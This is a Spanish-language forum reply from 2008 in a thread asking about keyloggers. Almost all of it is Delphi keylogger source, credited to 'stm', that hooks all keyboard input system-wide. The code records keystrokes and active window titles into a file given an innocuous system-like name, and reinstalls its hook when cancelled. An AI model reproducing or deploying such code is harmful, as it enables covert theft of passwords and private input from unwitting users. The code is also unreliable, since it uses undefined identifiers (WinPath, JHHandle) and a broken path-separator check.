Tema: keylogger?
Ver Mensaje Individual
  #2  
Antiguo 20-01-2008
javier20 javier20 is offline
No confirmado
  
Registrado: oct 2006
Posts: 18
Reputación: 0
javier20 Va por buen camino
creo que si mira este por ej usa hooks

Código Delphi [-]
//keylogger example by stm

program Project2;

uses
windows,messages;

var
szCurApp: string;
HookHandle: HHook;
lpMsg: TMsg;

function ExtractFilePath(APath:string):string;
var
LI,LJ:Integer;
begin
if (Length(APath)<>0) and (Pos('\',APath)>0) then
begin
  LJ:=0;
  for LI:=Length(APath) downto 1 do
   if APath[LI]='' then
   begin
    LJ:=LI;
    Break;
   end;
  Result:=Copy(APath,1,LJ);
end else Result:='';
end;

function CurrentDir:String;
var
  Buffer:array[0..260] of Char;
begin
  GetModuleFileName(0, Buffer, Sizeof(Buffer));
  result:=ExtractFilePath(Buffer);
end;

function JHProc(nCode:integer; wParam: Longint; var EventStrut: TEVENTMSG): Longint; stdcall;
var
szletta,HBuf,ThePath:string;
hFile,BytesWritten:dword;
szCurAppNm:array[0..260] of Char;
Charry:Array[0..1] of Char;
VirtKey,ScanCode:Cardinal;
KeyState:TKeyBoardState;
nametext:Array[0..32] of Char;
begin
if (nCode = HC_ACTION) and (EventStrut.message = WM_KEYDOWN)
  then begin
   VirtKey:=LOBYTE(EventStrut.paramL);
   ScanCode:=HIBYTE(EventStrut.paramL);
   ScanCode:=ScanCode shl 16;
   ThePath:=WinPath+'syskl32.ss';// syskl32.ss is where it stores the logged Keys

   hFile:=CreateFile(pchar(ThePath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
   SetFilePointer(hFile, 0, nil, FILE_END);
   GetWindowText(GetForegroundWindow, szCurAppNm, sizeof(szCurAppNm));
   if szCurAppNm <> szCurApp
    then begin
     szCurApp:=szCurAppNm;
     HBuf:=#13#10+#13#10+'[ '+szCurAppNm+' ]'+#13#10;
     WriteFile(hFile, pchar(HBuf)^, length(HBuf), BytesWritten, nil);
    end;
   GetKeyNameText(ScanCode,nametext,sizeof(nametext));
   if VirtKey = VK_CAPITAL then szletta:=#0
   else if VirtKey = VK_SHIFT then szletta:=#0
   else if VirtKey = VK_SPACE then szletta:=' '
   else if lstrlen(nametext) > 1 then szletta:='['+nametext+']'
   else
    begin
     GetKeyboardState(KeyState);
     ToAscii(VirtKey,ScanCode, KeyState, Charry, 0);
     szletta:=Charry;
    end;
   if szletta <> '' then WriteFile(hFile, pchar(szletta)^, length(szletta), BytesWritten, nil);
   CloseHandle(hFile);
  end;
CallNextHookEx(JHHandle, nCode, wParam, Integer(@EventStrut));
Result:=0;
end;

begin
HookHandle:=SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
while 1=1
  do begin
   WaitMessage;
   GetMessage(lpMsg,0,0,0);
   if lpMsg.message = WM_CANCELJOURNAL then HookHandle:=SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
  end;
end.
Responder Con Cita